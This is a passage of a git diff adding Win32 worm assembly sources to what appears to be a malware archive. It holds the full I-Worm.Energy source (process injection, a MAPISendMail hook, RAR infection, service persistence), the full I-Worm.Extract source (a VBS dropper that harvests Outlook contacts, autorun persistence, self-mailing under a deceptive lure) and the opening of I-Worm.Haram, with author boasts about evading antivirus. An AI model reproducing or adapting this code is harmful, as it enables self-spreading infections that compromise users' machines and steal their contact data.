023h, 046h, 031h, 02Fh + DB 035h, 02Eh, 023h, 022h, 046h, 032h, 029h, 046h, 035h + DB 023h, 023h, 046h, 027h, 035h, 046h, 02Bh, 033h, 025h + DB 02Eh, 046h, 029h, 020h, 046h, 032h, 02Eh, 023h, 046h + DB 02Bh, 027h, 022h, 046h, 027h, 028h, 022h, 06Bh, 06Ch + DB 02Bh, 027h, 025h, 027h, 024h, 034h, 023h, 046h, 027h + DB 035h, 046h, 032h, 02Eh, 023h, 03Fh, 046h, 031h, 023h + DB 034h, 023h, 046h, 032h, 029h, 046h, 035h, 023h, 023h + DB 046h, 032h, 02Eh, 027h, 032h, 046h, 022h, 027h, 03Fh + DB 048h, 046h, 020h, 029h, 034h, 046h, 032h, 02Eh, 023h + DB 02Bh, 046h, 027h, 028h, 046h, 02Fh, 022h, 03Fh, 02Ah + DB 02Ah, 02Fh, 025h, 06Bh, 06Ch, 035h, 033h, 02Bh, 02Bh + DB 023h, 034h, 046h, 027h, 020h, 032h, 023h, 034h, 028h + DB 029h, 029h, 028h, 046h, 022h, 034h, 02Fh, 030h, 023h + DB 046h, 024h, 023h, 025h, 027h, 02Bh, 023h, 046h, 027h + DB 046h, 028h, 02Fh, 021h, 02Eh, 032h, 02Bh, 027h, 034h + DB 023h, 048h, 046h, 032h, 02Eh, 023h, 046h, 023h, 030h + DB 023h, 028h, 032h, 035h, 046h, 029h, 020h, 06Bh, 06Ch + DB 032h, 02Eh, 027h, 032h, 046h, 022h, 027h, 03Fh, 046h + DB 031h, 023h, 034h, 023h, 046h, 032h, 029h, 046h, 02Ah + DB 023h, 027h, 022h, 046h, 032h, 029h, 046h, 032h, 02Eh + DB 023h, 046h, 022h, 02Fh, 035h, 025h, 029h, 030h, 023h + DB 034h, 03Fh, 046h, 029h, 020h, 046h, 029h, 028h, 023h + DB 046h, 029h, 020h, 046h, 032h, 02Eh, 023h, 046h, 02Bh + DB 029h, 035h, 032h, 06Bh, 06Ch, 024h, 02Fh, 03Ch, 027h + DB 034h, 034h, 023h, 046h, 025h, 034h, 02Fh, 02Bh, 023h + DB 035h, 046h, 02Fh, 028h, 046h, 032h, 02Eh, 023h, 046h + DB 027h, 028h, 028h, 027h, 02Ah, 035h, 046h, 029h, 020h + DB 046h, 027h, 02Bh, 023h, 034h, 02Fh, 025h, 027h, 028h + DB 046h, 02Eh, 02Fh, 035h, 032h, 029h, 034h, 03Fh, 04Ah + DB 06Bh, 06Ch, 032h, 02Eh, 023h, 046h, 032h, 023h, 03Eh + DB 027h, 035h, 046h, 025h, 02Eh, 027h, 02Fh, 028h, 046h + DB 035h, 027h, 031h, 046h, 02Bh, 027h, 035h, 035h, 027h + DB 025h, 034h, 023h, 048h, 048h, 048h, 044h, 06Bh, 06Ch + + END START + + ; *shrug*, haven't really finished this 
piece-o-crap, + ; mainly because I got fed up with all them bugs in + ; the server programs.. also not sure if the NetBios + ; shit works on remotes.. oh fuck it :| +[CHAINSAW.ASM] +[CHAINSAW.RC] +I ICON DISCARDABLE "BLACK.ICO" +[CHAINSAW.RC] +[Q.BAT] +TASM32 CHAINSAW.ASM /ml /m +TLINK32 CHAINSAW.OBJ C:\TASM\LIB\IMPORT32.LIB WININET.LIB -aa +BRC32 CHAINSAW.RC +UPX\UPX CHAINSAW.EXE --force +[Q.BAT] diff --git a/Win32/I-Worm.Energy.asm b/Win32/I-Worm.Energy.asm new file mode 100644 index 00000000..f3d1ce6a --- /dev/null +++ b/Win32/I-Worm.Energy.asm 
@@ -0,0 +1,727 @@ + +COMMENT # + + Ŀ + I-Worm.Energy + + Ŀ + by Benny/29A + + +hey all... + + +it was one b0ring sunday, when I decided to code some small and kewl virus... +I was tired from coding large projectz (HIV, XTC)... I wanted to code one +worm with some nice ideaz, like the Win2k.Stream. + +and here it is. after some meditationz, full of experiencez from psychedelics +I decided to call this worm "Energy"... it is very small worm, spreading via +RAR filez. it can parse all processes, hook there MAPISendMail API procedure +and infect all attached RAR filez in a message by dropping itself to there. +very similar technique of the process'es address space manipulationz is +described in my article "Multi-process residency" and Win32.HIV virus. surely +it can't work on Win95/98 systemz. it worx on Windows 2000 OS, and (perhaps) +also on earlier versionz of Windows NT - but I don't know, I haven't tested it. + +it can stay resident in memory as a service, by standard API callz, valid only +in NT systemz. while infecting the RAR archivez it addz itself to there under +the "SETUP.EXE" filename, containing also the standard setup icon. I tried to +optimize the source a bit... I know the worm is not super-small, but I it is +resident heavilly armoured very effective tiny mail-spreading worm. + + +the scheme of execution: + + +after execution: +- anti-* stuff +- if initialized by SCM, run as a service process +- copy worm to system directory as "ENERGY.EXE" +- register worm as service process and run it everytime the OS will start +- enum processes, find MAPI32.dll there and hook MAPSendMail (using many + trics) +- wait one minute and again + +hook_procedure: +- parse embedded filez and search for RAR filez. +- infect them by worm file: SETUP.EXE, mark as read-only (already-infected + mark). + + +the worm is encrypted/compressed by "tElock, version 0.51", one very nice +utility for armouring executable filez. this protector containz many nice +anti-* featurez. 
that's why I decided to use it. and also becoz I think guyz at +AVP can't handle this one. + +it is possible that worm containz some bugz. yeah, but I don't care... I'm glad +I was able to finish it in 2 dayz and that it was not b0ring. I had a fun. + + + +If you would like to consult anything with me, feel free to contact me... + + + +(c) 14th November 2000 Ŀ +Czech Republic Benny / 29A Ŀ + @ benny_29a@privacyx.com + @ http://benny29a.cjb.net + +# + + +.586p +.model flat ;blablabla + +extrn GetLastError:PROC ;needed APIz +extrn EnumProcesses:PROC +extrn OpenProcess:PROC +extrn VirtualProtect:PROC +extrn VirtualAllocEx:PROC +extrn VirtualFreeEx:PROC +extrn CloseHandle:PROC +extrn CreateRemoteThread:PROC +extrn WriteProcessMemory:PROC +extrn Sleep:PROC +extrn WaitForSingleObject:PROC +extrn GetModuleHandleA:PROC +extrn GetProcAddress:PROC +extrn CreateFileA:PROC +extrn WriteFile:PROC +extrn GetModuleFileNameA:PROC +extrn GetFileSize:PROC +extrn ReadFile:PROC +extrn VirtualFree:PROC +extrn VirtualAlloc:PROC +extrn SetFilePointer:PROC +extrn SetFileAttributesA:PROC +extrn OpenMutexA:PROC +extrn ExitThread:PROC +extrn GetSystemDirectoryA:PROC +extrn CopyFileA:PROC + + +;extrn OpenServiceA:PROC +;extrn DeleteService:PROC ;***debug only! +extrn OpenSCManagerA:PROC +extrn CreateServiceA:PROC +extrn CloseServiceHandle:PROC +extrn StartServiceCtrlDispatcherA:PROC +extrn RegisterServiceCtrlHandlerA:PROC +extrn SetServiceStatus:PROC + + +include useful.inc ;include filez +include win32api.inc + + +PROC_COUNT equ 40*4 ;number of processes + + +.data + db ? ;some data + +.code +Start: ;worm code starts here + pushad + @SEH_SetupFrame ;setup SEH frame + +e_name: @pushsz 'EnErGy' + push 0 + push 1 + call OpenMutexA ;check if mutex is + test eax,eax ;created, if not, + je end_seh ;we are prob. 
debugged + push eax + call CloseHandle ;close its handle + + jmp SVCRegister ;logging as a service + +e_svc: push 256 + mov esi, offset worm_name + push esi + push 0 + call GetModuleFileNameA ;get path+filename of + ;the worm + mov edi,offset sys_dir + push edi + push 256 + push edi + call GetSystemDirectoryA ;get windowz system dir. + add edi,eax + mov al,'\' + stosb + mov eax,'rene' + stosd + mov eax,'e.yg' + stosd + mov eax,'ex' + stosd ;construct path+filename + + pop edi + push 0 + push edi + push esi + call CopyFileA ;copy worm to sys. dir. + + call SVCCreate ;register as a service + + push api_num + pop ecx + call @api_table + dd offset GetModuleHandleA ;adressez of APIz + dd offset GetProcAddress + dd offset VirtualProtect + dd offset CreateFileA + dd offset CloseHandle + dd offset WriteFile + dd offset GetFileSize + dd offset ReadFile + dd offset VirtualFree + dd offset VirtualAlloc + dd offset SetFilePointer + dd offset SetFileAttributesA +api_num = 12 +@api_table: + pop ebx + + call @api_dest ;addressez of variablez + dd offset _gmha ;that will hold APIz + dd offset _gpa + dd offset _vp + dd offset _cfa + dd offset _ch + dd offset _wf + dd offset _gfs + dd offset _rf + dd offset _vf + dd offset _va + dd offset _sfp + dd offset _sfaa +@api_dest: + pop esi + +get_apiz: + dec ecx ;decrement counter + mov eax,[ebx+ecx*4] + mov eax,[eax+2] + mov eax,[eax] + mov edx,[esi+ecx*4] + mov [edx],eax ;store API address + test ecx,ecx + jne get_apiz + +worm_loop: + mov ebx,offset tmp + push ebx + push PROC_COUNT + mov esi,offset proc_dump + push esi + call EnumProcesses ;enum all processez + dec eax + jne end_seh + + mov ecx,[ebx] ;try this PID +p_check:lodsd + call proc_infect ;try to infect it + add ecx,-3 + loop p_check ;try next PID + +worm_wait: + push 60000 + call Sleep ;wait one minute + jmp worm_loop ;and try again. 
+ + +;infect processez +proc_infect Proc + pushad + push eax + push 0 + push 2 or 8 or 10h or 20h or 400h + call OpenProcess ;get handle to process + xchg eax,ecx + jecxz end_proc_infect + mov ebx,ecx + + push PAGE_READWRITE + push MEM_RESERVE or MEM_COMMIT + push virtual_end-Start + push 0 + push ebx + call VirtualAllocEx ;allocate there memory + xchg eax,ecx ;for worm + jecxz end_proc_infect2 + mov esi,ecx + + push 0 + push virtual_end-Start + push offset Start + push esi + push ebx + call WriteProcessMemory ;copy there worm body + dec eax + jne end_proc_infect3 + + lea edx,[esi+offset ThreadEntry-offset Start] + push eax + push eax + push eax + push edx + push eax + push eax + push ebx + call CreateRemoteThread ;create thread there + xchg eax,ecx + jecxz end_proc_infect3 + push ecx + + push -1 + push ecx + call WaitForSingleObject ;wait for its termination + call CloseHandle ;and close its handle + jmp end_proc_infect2 ;and quit + +end_proc_infect3: + push MEM_RELEASE + push 0 + push esi + push ebx + call VirtualFreeEx ;release memory if failed + +end_proc_infect2: + push ebx + call CloseHandle ;close handle to process +end_proc_infect: + popad + ret ;and quit +proc_infect EndP + + +;remote thread procedure +ThreadEntry Proc + pushad + @SEH_SetupFrame ;setup SEH frame + call gdelta +gdelta: pop ebp ;get delta offset + + @pushsz 'MAPI32.dll' + mov eax,12345678h +_gmha = dword ptr $-4 + call eax ;get address of MAPI32.dll + xchg eax,ecx + jecxz end_seh ;quit if not loaded + + @pushsz 'MAPISendMail' + push ecx + mov eax,12345678h +_gpa = dword ptr $-4 + call eax ;get address of + xchg eax,ecx ;MAPISendMail API + jecxz end_seh + mov esi,ecx ;to ESI + + lea eax,[ebp + tmp - gdelta] + push eax + push PAGE_READWRITE + push 5 + push esi + mov eax,12345678h +_vp = dword ptr $-4 + call eax ;release page protection + xchg eax,ecx + jecxz end_seh + + call hook_api ;hook the API + +end_seh:@SEH_RemoveFrame ;remove SEH frame + popad ;and quit + ret + +;proc for API hooking 
+hook_api: + mov [ebp + old_MAPI_addr - gdelta],esi + push esi + lea edi,[ebp + old_MAPI_api - gdelta] + movsd + movsb ;save first bytez of API + pop edi + mov ebx,edi + + lea eax,[ebp + MAPI_hooker - gdelta] + sub ebx,eax + neg ebx + add ebx,-5 + mov al,0E9h + stosb + xchg eax,ebx + stosd ;overwrite by JMP + ret + +;the API hooker +MAPI_hooker: + push 12345678h +old_MAPI_addr = dword ptr $-4 ;save the address of API + + pushad + mov edi,[esp.cPushad] ;get ptr to message + @SEH_SetupFrame ;setup SEH frame + push edi + + mov ebx,[esp.cPushad.28] + mov ecx,[ebx+40] ;number of attachmentz + mov ebx,[ebx+44] ;ptr to file fieldz + +f_parse:mov esi,[ebx+12] + lea edi,[ebp + arc_buffer - gdelta] + push edi + @copysz + dec edi + cmp byte ptr [edi-1],'\' + je over_slash + mov al,'\' + stosb +over_slash: + mov esi,[ebx+16] + @copysz + or [esi-5],20202020h ;lower case + cmp [esi-5],'rar.' + pop esi ;create path+filename + jne o_r ;quit if not RAR file + call infect_archive ;try to infect this file +o_r: sub ebx,-24 + loop f_parse ;try another file in msg + + pop edi + call @m_res + old_MAPI_api db 5 dup (90h) +@m_res: pop esi + movsd + movsb ;remove the API hooker + jmp end_seh ;and quit + + +;procedure for RAR archive infecting +infect_archive: + pushad + @SEH_SetupFrame ;setup SEH frame + call gd +gd: pop ebp ;get delta offset + + lea eax,[ebp + worm_name - gd] ;get worm filename + push 0 + push FILE_ATTRIBUTE_NORMAL + push OPEN_EXISTING + push 0 + push 0 + push GENERIC_READ + push eax + call [ebp + _cfa - gd] ;open worm file + inc eax + je end_seh + dec eax + mov [ebp + hFile - gd],eax ;save handle + + push 0 + push eax + mov eax,12345678h +_gfs = dword ptr $-4 + call eax ;get its size + push eax + + push PAGE_READWRITE + push MEM_RESERVE or MEM_COMMIT + push eax + push 0 + mov eax,12345678h +_va = dword ptr $-4 + call eax ;allocate enough memory + test eax,eax + pop edx + je end_file + xchg eax,ebx + + push edx + push 0 + lea eax,[ebp + tmp - gd] + push eax + push edx + 
push ebx + push dword ptr [ebp + hFile - gd] + mov eax,12345678h +_rf = dword ptr $-4 ;and copy there worm + call eax + call close_file ;close handle to file + pop edi + + pushad + mov esi,ebx + call CRC32 ;calculate CRC32 of + mov [ebp + RARCRC32 - gd],eax ;the worm file + popad + + push 0 + push FILE_ATTRIBUTE_NORMAL + push OPEN_EXISTING + push 0 + push 0 + push GENERIC_READ or GENERIC_WRITE + push esi + mov eax,12345678h +_cfa = dword ptr $-4 + call eax ;open the archive + inc eax + je end_file2 + dec eax + mov [ebp + hFile - gd],eax ;save its handle + + push 2 + push 0 + push 0 + push eax + mov eax,12345678h +_sfp = dword ptr $-4 + call eax ;go to EOF + + pushad + lea esi,[ebp + RARHeaderCRC+2 - gd] + push end_RAR-RARHeader-2 + pop edi + call CRC32 ;calculate CRC32 of + mov [ebp + RARHeaderCRC - gd],ax ;the RAR file header + popad ;and save it + + push 0 + lea eax,[ebp + tmp - gd] + push eax + push end_RAR-RARHeader + call end_RAR +RARHeader: ;No comment ;) +RARHeaderCRC dw 0 +RARType db 74h +RARFlags dw 8000h +RARHSize dw end_RAR-RARHeader +RARCompressed dd 2000h +RAROriginal dd 2000h +RAROS db 0 +RARCRC32 dd 0 +RARFileDateTime dd 12345678h +RARNeedVer db 14h +RARMethod db 30h +RARFNameSize dw end_RAR-RARName +RARAttrib dd 0 +RARName db 'SETUP.EXE' +end_RAR: + push dword ptr [ebp + hFile - gd] + mov eax,12345678h +_wf = dword ptr $-4 + call eax ;write RAR file header + + push 0 + lea eax,[ebp + tmp - gd] + push eax + push edi + push ebx + push dword ptr [ebp + hFile - gd] + call [ebp + _wf - gd] ;write the worm + +end_file2: + push MEM_RELEASE + push 0 + push ebx + mov eax,12345678h +_vf = dword ptr $-4 + call eax ;release the memory +end_file: + call close_file ;close the archive + + push FILE_ATTRIBUTE_READONLY + push esi + mov eax,12345678h +_sfaa = dword ptr $-4 + call eax ;set READ-ONLY attribute + jmp end_seh ;and quit + +close_file: + push 12345678h ;handle... 
+hFile = dword ptr $-4 + mov eax,12345678h +_ch = dword ptr $-4 + call eax ;close file handle + ret + +CRC32 Proc + push ecx ;procedure for + push edx ;calculating CRC32s + push ebx ;at run-time + xor ecx,ecx + dec ecx + mov edx,ecx +NextByteCRC: + xor eax,eax + xor ebx,ebx + lodsb + xor al,cl + mov cl,ch + mov ch,dl + mov dl,dh + mov dh,8 +NextBitCRC: + shr bx,1 + rcr ax,1 + jnc NoCRC + xor ax,08320h + xor bx,0EDB8h +NoCRC: dec dh + jnz NextBitCRC + xor ecx,eax + xor edx,ebx + dec edi + jne NextByteCRC + not edx + not ecx + pop ebx + mov eax,edx + rol eax,16 + mov ax,cx + pop edx + pop ecx +SVCHandler: + ret +CRC32 EndP +ThreadEntry EndP + + +;log on to SCM +SVCRegister Proc + call _dt + dd offset e_name+5 + dd offset service_start + dd 0 + dd 0 +_dt: call StartServiceCtrlDispatcherA ;start service dispatcher + dec eax + jne e_svc ;quit if error (no service + ;requestz) + push 0 + call ExitThread ;terminate this thread + +service_start: ;execution goes here... + pushad + @SEH_SetupFrame ;setup SEH frame + + push offset SVCHandler + push offset e_name+5 + call RegisterServiceCtrlHandlerA ;register service control + test eax,eax ;handler + je e_svc ;quit if error + push eax + + call _ss +ss_: dd 10h or 20h + dd 4 + dd 0 + dd 0 + dd 0 + dd 0 + dd 0 +_ss: push eax + call SetServiceStatus ;set service status + call CloseServiceHandle ;close service handle + jmp e_svc ;and quit +SVCRegister EndP + + +;create item at SCM +SVCCreate Proc + push 000F0000h or 2 + push 0 + push 0 + call OpenSCManagerA ;get handle to SCM + test eax,eax + je e_scm0 + xchg eax,esi + +; push 000F0000h or 1 or 2 or 4 or 8 or 10h or 20h or 40h or 80h or 100h +; push offset e_name+5 +; push esi +; call OpenServiceA ;*** debug! +; +; push eax +; push eax +; call DeleteService ;*** debug! +; call CloseServiceHandle ;*** debug! 
+ + xor eax,eax + push eax + push eax + push eax + push eax + push eax + push offset sys_dir + push eax + push 2 + push 10h + push 000F0000h or 1 or 2 or 4 or 8 or 10h or 20h or 40h or 80h or 100h + push offset e_name+5 + push dword ptr [esp] + push esi + call CreateServiceA ;create service item + test eax,eax ;at SCM + je e_scm1 ;quit if error + + push eax + call CloseServiceHandle ;close service handlez +e_scm1: push esi + call CloseServiceHandle ;... +e_scm0: ret ;and quit +SVCCreate EndP + + +signature db 0,'[I-Worm.Energy] by Benny/29A',0 + ;signature + proc_dump db PROC_COUNT dup (?) ;buffer for PIDz + worm_name db 256 dup (?) ;buffer for filename + tmp dd ? ;temporary variable + sys_dir db 256 dup (?) ;buffer for system dir. + arc_buffer db 256 dup (?) ;buffer for archive + ;filename +virtual_end: ;...end of virus. +ends +end Start ;. + + +;bonus: +;here are lyrics from "Imagine", one very nice song from John Lennon. + +; Imagine there's no heaven, +; It's easy if you try, +; No hell below us, +; Above us only sky, +; Imagine all the people +; living for today... +; +; Imagine there's no countries, +; It isn't hard to do, +; Nothing to kill or die for, +; No religion too, +; Imagine all the people +; living life in peace... +; +; You may say I'm a dreamer, +; but I'm not the only one, +; I hope some day you'll join us, +; And the world will live as one. +; +; Imagine no possesions, +; I wonder if you can, +; No need for greed or hunger, +; A brotherhood of man, +; Imagine all the people +; Sharing all the world... +; +; You may say I'm a dreamer, +; but I'm not the only one, +; I hope some day you'll join us, +; And the world will live as one. diff --git a/Win32/I-Worm.Extract.asm b/Win32/I-Worm.Extract.asm new file mode 100644 index 00000000..81702ef7 --- /dev/null +++ b/Win32/I-Worm.Extract.asm 
@@ -0,0 +1,480 @@ +comment # +Name : I-Worm.Extract +Author : PetiK +Date : February 3rd 2002 - February 4th 2002 +Size : 5632 + +Action : +# + +.586p +.model flat +.code + +JUMPS + +api macro a +extrn a:proc +call a +endm + +include Useful.inc +include myinclude.inc + +start_worm: + @pushsz "KERNEL32.DLL" + api GetModuleHandleA + xchg eax,ebx + +kern macro x + push offset sz&x + push ebx + api GetProcAddress + mov _ptk&x,eax + endm + + kern CloseHandle + kern CopyFileA + kern CreateDirectoryA + kern CreateFileA + kern CreateFileMappingA + kern DeleteFileA + kern GetDateFormatA + kern GetFileSize + kern GetModuleFileNameA + kern GetSystemDirectoryA + kern GetSystemTime + kern GetTimeFormatA + kern GetWindowsDirectoryA + kern lstrcat + kern lstrcmp + kern lstrcpy + kern lstrlen + kern MapViewOfFile + kern SetCurrentDirectoryA + kern Sleep + kern UnmapViewOfFile + kern WinExec + kern WriteFile + kern WriteProfileStringA + kern WritePrivateProfileStringA + + + push 50 + mov esi,offset orig_worm + push esi + push 0 + call _ptkGetModuleFileNameA + + push 50 + push offset verif_worm + call _ptkGetSystemDirectoryA + @pushsz "\UPDATEW32.EXE" + push offset verif_worm + call _ptklstrcat + + push esi + push offset verif_worm + call _ptklstrcmp + test eax,eax + jz continue_worm + + mov edi,offset copy_worm + push edi + push 50 + push edi + call _ptkGetSystemDirectoryA + add edi,eax + mov eax,"dpU\" + stosd + mov eax,"Weta" + stosd + mov eax,"e.23" + stosd + mov eax,"ex" + stosd + pop edi + +copy_w: push 0 + push edi + push esi + call _ptkCopyFileA + +run_w: push edi + @pushsz "RUN" + @pushsz "WINDOWS" + call _ptkWriteProfileStringA + + call CreateDate + push 50 + push offset realname + push offset orig_worm + api GetFileTitleA + + @pushsz " - " + push offset date + call _ptklstrcat + push offset realname + push offset date + call _ptklstrcat + +f_mess: push 10h + push offset date + call @mess + db "Cannot Open this File !",CRLF,CRLF + db "If you downloaded this file, try 
downloading again.",0 + @mess: + push 0 + api MessageBoxA + jmp end_worm + +continue_worm: + push 50 + push offset vbsfile + call _ptkGetWindowsDirectoryA + @pushsz "\ExtractVbs.vbs" + push offset vbsfile + call _ptklstrcat + + push 0 + push 20h + push 2 + push 0 + push 1 + push 40000000h + push offset vbsfile + call _ptkCreateFileA + xchg eax,ebx + push 0 + push offset octets + push e_vbs - s_vbs + push offset s_vbs + push ebx + call _ptkWriteFile + push ebx + call _ptkCloseHandle + + push offset vbsfile + push offset vbsexec + call _ptklstrcpy + push 4 + push offset execcontrol + call _ptkWinExec + push 5000 + call _ptkSleep + push offset vbsfile + call _ptkDeleteFileA + +payload: + push offset Systime + call _ptkGetSystemTime + cmp [Systime.wDay],29 + jne end_pay + push 40h + @pushsz "I-Worm.Extract" + call e_mess + db "Hi man, you received my worm !",CRLF + db "Don't panic, it doesn't format your computer",CRLF,CRLF + db 9,"Bye and Have a Nice Day.",0 + e_mess: + push 0 + api MessageBoxA +end_pay: + +sh_gsf: push 0 + push 5 + push offset progra + push 0 + api SHGetSpecialFolderPathA + push offset progra + call _ptkSetCurrentDirectoryA + @pushsz "Update Windows 32bits" + call _ptkCreateDirectoryA + @pushsz "\Update Windows 32bits" + push offset progra + call _ptklstrcat + push offset progra + call _ptkSetCurrentDirectoryA + push 0 + @pushsz "MAJ.exe" + push offset orig_worm + call _ptkCopyFileA + +verif_inet: + push 0 + push offset inet + api InternetGetConnectedState + dec eax + jnz verif_inet + + push 50 + push offset winpath + call _ptkGetWindowsDirectoryA + push offset winpath + call _ptkSetCurrentDirectoryA + +spread: pushad + push 00h + push 80h + push 03h + push 00h + push 01h + push 80000000h + @pushsz "Outlook_Addr.txt" + call _ptkCreateFileA + inc eax + je end_spread + dec eax + xchg eax,ebx + + xor eax,eax + push eax + push eax + push eax + push 2 + push eax + push ebx + call _ptkCreateFileMappingA + test eax,eax + je end_s1 + xchg eax,ebp + + xor 
eax,eax + push eax + push eax + push eax + push 4 + push ebp + call _ptkMapViewOfFile + test eax,eax + je end_s2 + xchg eax,esi + + push 0 + push ebx + call _ptkGetFileSize + cmp eax,4 + jbe end_s3 + +scan_mail: + xor edx,edx + mov edi,offset mail_addr + push edi + p_c: lodsb + cmp al," " + je car_s + cmp al,";" + je end_m + cmp al,"#" + je f_mail + cmp al,'@' + jne not_a + inc edx + not_a: stosb + jmp p_c + car_s: inc esi + jmp p_c + end_m: xor al,al + stosb + pop edi + test edx,edx + je scan_mail + call send_mail + jmp scan_mail + f_mail: + +end_s3: push esi + call _ptkUnmapViewOfFile +end_s2: push ebp + call _ptkCloseHandle +end_s1: push ebx + call _ptkCloseHandle +end_spread: popad + +end_worm: + push 0 + api ExitProcess + +send_mail: + call CreateDate + call CreateTime + @pushsz "C:\liste.ini" + push offset mail_addr + push offset time + push offset date + call _ptkWritePrivateProfileStringA + + xor eax,eax + push eax + push eax + push offset Message + push eax + push [sess] + api MAPISendMail + ret + +CreateDate Proc + pushad + mov edi,offset date + push 32 + push edi + @pushsz "dddd, dd MMMM yyyy" + push 0 + push 0 + push 9 + call _ptkGetDateFormatA + popad + ret +CreateDate EndP +CreateTime Proc + pushad + mov edi,offset time + push 32 + push edi + @pushsz "HH:mm:ss" + push 0 + push 0 + push 9 + call _ptkGetTimeFormatA + popad + ret +CreateTime EndP + + +.data +copy_worm db 50 dup (0) +orig_worm db 50 dup (0) +verif_worm db 50 dup (0) +vbsfile db 50 dup (0) +winpath db 50 dup (0) +progra db 50 dup (0) +mail_addr db 128 dup (?) +realname db 50 dup (0) +date db 30 dup (?) +time db 9 dup (?) +octets dd ? +inet dd 0 +sess dd 0 + +subject db "Re: Check This...",0 +body db "Hi",CRLF + db "This is the file you ask for. Open quickly ! It's very important",CRLF,CRLF + db 9,"Best Regards",CRLF,CRLF,CRLF + db "Salut,",CRLF + db "Voici le fichier que tu cherches. Ouvre vite ! 
C'est trs important",CRLF,CRLF + db 9,"Mes sincres salutations",0 +filename db "important.exe",0 + +Message dd ? + dd offset subject + dd offset body + dd ? + dd ? + dd ? + dd 2 + dd offset MsgFrom + dd 1 + dd offset MsgTo + dd 1 + dd offset Attach + +MsgFrom dd ? + dd ? + dd ? + dd ? + dd ? + dd ? + +MsgTo dd ? + dd 1 + dd offset mail_addr + dd offset mail_addr + dd ? + dd ? + +Attach dd ? + dd ? + dd ? + dd offset orig_worm + dd offset filename + dd ? + +szCloseHandle db "CloseHandle",0 +szCopyFileA db "CopyFileA",0 +szCreateDirectoryA db "CreateDirectoryA",0 +szCreateFileA db "CreateFileA",0 +szCreateFileMappingA db "CreateFileMappingA",0 +szDeleteFileA db "DeleteFileA",0 +szGetDateFormatA db "GetDateFormatA",0 +szGetFileSize db "GetFileSize",0 +szGetModuleFileNameA db "GetModuleFileNameA",0 +szGetSystemDirectoryA db "GetSystemDirectoryA",0 +szGetSystemTime db "GetSystemTime",0 +szGetTimeFormatA db "GetTimeFormatA",0 +szGetWindowsDirectoryA db "GetWindowsDirectoryA",0 +szlstrcat db "lstrcat",0 +szlstrcmp db "lstrcmp",0 +szlstrcpy db "lstrcpy",0 +szlstrlen db "lstrlen",0 +szMapViewOfFile db "MapViewOfFile",0 +szSetCurrentDirectoryA db "SetCurrentDirectoryA",0 +szSleep db "Sleep",0 +szUnmapViewOfFile db "UnmapViewOfFile",0 +szWinExec db "WinExec",0 +szWriteFile db "WriteFile",0 +szWritePrivateProfileStringA db "WritePrivateProfileStringA",0 +szWriteProfileStringA db "WriteProfileStringA",0 + +_ptkCloseHandle dd ? +_ptkCopyFileA dd ? +_ptkCreateDirectoryA dd ? +_ptkCreateFileA dd ? +_ptkCreateFileMappingA dd ? +_ptkDeleteFileA dd ? +_ptkGetDateFormatA dd ? +_ptkGetFileSize dd ? +_ptkGetModuleFileNameA dd ? +_ptkGetSystemDirectoryA dd ? +_ptkGetSystemTime dd ? +_ptkGetTimeFormatA dd ? +_ptkGetWindowsDirectoryA dd ? +_ptklstrcat dd ? +_ptklstrcmp dd ? +_ptklstrcpy dd ? +_ptklstrlen dd ? +_ptkMapViewOfFile dd ? +_ptkSetCurrentDirectoryA dd ? +_ptkSleep dd ? +_ptkUnmapViewOfFile dd ? +_ptkWinExec dd ? +_ptkWriteFile dd ? +_ptkWriteProfileStringA dd ? 
+_ptkWritePrivateProfileStringA dd ? + +s_vbs: db 'On Error Resume Next',CRLF + db 'Set f=CreateObject("Scripting.FileSystemObject")',CRLF + db 'Set win=f.GetSpecialFolder(0)',CRLF + db 'Set c=f.CreateTextFile(win&"\Outlook_Addr.txt")',CRLF + db 'c.Close',CRLF + db 'Set out=CreateObject("Outlook.Application")',CRLF + db 'Set mapi=out.GetNameSpace("MAPI")',CRLF + db 'adr="extractcounter@multimania.com"',CRLF + db 'For Each mail in mapi.AddressLists',CRLF + db 'If mail.AddressEntries.Count <> 0 Then',CRLF + db 'For O=1 To mail.AddressEntries.Count',CRLF + db 'adr=adr &";"& mail.AddressEntries(O).Address',CRLF + db 'Next',CRLF + db 'End If',CRLF + db 'Next',CRLF + db 'adr=adr &";#"',CRLF,CRLF + db 'Set c=f.OpenTextFile(win&"\Outlook_Addr.txt",2)',CRLF + db 'c.WriteLine adr',CRLF + db 'c.Close',CRLF +e_vbs: + +execcontrol db "wscript " + vbsexec db 50 dup (0) + db "",0 + +end start_worm +end \ No newline at end of file diff --git a/Win32/I-Worm.Haram.asm b/Win32/I-Worm.Haram.asm new file mode 100644 index 00000000..1d2f3fec --- /dev/null +++ b/Win32/I-Worm.Haram.asm 
@@ -0,0 +1,592 @@ +comment * +Name : I-Worm.Haram +Author : PetiK + +Language : win32asm +Date : May 13th 2002 - June 1st 2002 + +Size : 5192 bytes (compressed with Petite Tool) + +Comments : - Copy to %sysdir%\FunnyGame.exe + - Search all doc files in "Personal" folder and create a new virus html file: + + example : document.doc -> document.htm + 1) 2) + + 1) Good DOC file + 2) Good HTM virus (1571 bytes) + + - Put the name of all active process and add .htm: + + example : process.exe -> process.exe.htm + 3) 4) + + 3) Real name of active process + 4) Real name of the HTM virus (in "C:\backup" folder for Win ME/2k/XP) + + - Create a random name file in StarUp folder to spread with Outlook + + - On the 10th, payload : open and close CD door and display a messagebox in loop + +* + +.586p +.model flat +.code + +JUMPS + +include win32api.inc + +LF equ 10 +CR equ 13 +CRLF equ <13,10> + +@pushsz macro msg2psh, empty + local next_instr + ifnb + %out too much arguments in macro '@pushsz' + .err + endif + call next_instr + db msg2psh,0 + next_instr: +endm + +@endsz macro + local nxtchr + nxtchr: lodsb + test al,al + jnz nxtchr +endm + +api macro a + extrn a:proc + call a +endm + +WIN32_FIND_DATA struct +dwFileAttributes dd 0 +ftCreationTime dd ?,? +ftLastAccessTime dd ?,? +ftLastWriteTime dd ?,? +nFileSizeHigh dd 0 +nFileSizeLow dd 0 +dwReserved0 dd 0,0 +cFileName db 260 dup(0) +cAlternateFileName db 14 dup(0) + db 2 dup (0) +WIN32_FIND_DATA ends + +PROCESSENTRY32 STRUCT + dwSize DWORD ? + cntUsage DWORD ? + th32ProcessID DWORD ? + th32DefaultHeapID DWORD ? + th32ModuleID DWORD ? + cntThreads DWORD ? + th32ParentProcessID DWORD ? + pcPriClassBase DWORD ? + dwFlags DWORD ? + szExeFile db 260 dup(?) 
